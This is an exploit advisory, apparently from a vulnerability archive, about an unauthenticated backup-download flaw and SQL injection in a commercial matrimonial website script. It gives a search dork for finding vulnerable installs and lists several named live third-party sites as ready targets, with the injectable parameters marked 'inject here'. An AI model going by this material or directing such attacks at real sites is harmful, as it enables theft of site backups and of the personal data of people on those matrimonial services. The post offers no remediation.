========================================================================
| # Title : Matrimonial Script unauthorized Export & Download Backup vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : n/a
| # Vendor : http://www.scubez.net/
| # Link : http://www.mscript.in/ * Demo: http://www.mscript.in/matrimonial-demo.html
| # Dork : "printprofile.php?id="
========================================================================
poc : https://www.youtube.com/watch?v=ZMw-JpgqrvU&feature=youtu.be
Download Backup :
add payload after choose a target " admin/excel_report.php "
http://searchmyaddress.biz/matri/admin/excel_report.php
Sql injection :
http://www.akankshamatrimonial.com/printprofile.php?id=MAT13534 => inject here
http://www.lagnamkaroti.com/viewprofile.php?id=MB00011 => inject here
Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------
|
jericho * Larry W. Cashdollar * moncet-1 * Shadow00715 * Ihsan Sencan |
|
===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ ===============================